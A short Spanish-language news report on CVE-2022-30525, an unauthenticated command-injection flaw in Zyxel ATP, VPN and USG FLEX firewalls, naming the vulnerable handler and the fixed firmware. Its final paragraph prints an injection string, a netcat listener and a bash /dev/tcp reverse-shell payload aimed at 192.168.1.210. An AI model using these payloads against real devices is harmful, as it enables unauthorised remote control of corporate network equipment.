Se ha identificado una vulnerabilidad crítica (CVE-2022-30525) en los dispositivos Zyxel de las series ATP, VPN y USG FLEX, diseñados para organizar el funcionamiento de firewalls, IDS y VPN en empresas, que permite a un atacante externo ejecutar código en el dispositivo sin derechos de usuario sin autenticación. Para llevar a cabo un ataque, un atacante debe poder enviar solicitudes al dispositivo utilizando el protocolo HTTP/HTTPS. Zyxel ha solucionado la vulnerabilidad en la actualización del firmware ZLD 5.30. Según el servicio Shodan, actualmente hay 16213 dispositivos potencialmente vulnerables en la red global que aceptan solicitudes a través de HTTP/HTTPS.
La operación se lleva a cabo enviando comandos especialmente diseñados al controlador web /ztp/cgi-bin/handler, accesible sin autenticación. El problema se debe a la falta de una limpieza adecuada de los parámetros de solicitud al ejecutar comandos en el sistema mediante la llamada os.system utilizada en la biblioteca lib_wan_settings.py y ejecutada al procesar la operación setWanPortSt.
Por ejemplo, un atacante podría pasar la cadena “; hacer ping 192.168.1.210;" lo que conducirá a la ejecución del comando “ping 192.168.1.210” en el sistema. Para obtener acceso al shell de comandos, puede ejecutar “nc -lvnp 1270” en su sistema y luego iniciar una conexión inversa enviando una solicitud al dispositivo con el símbolo '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Fuente: opennet.ru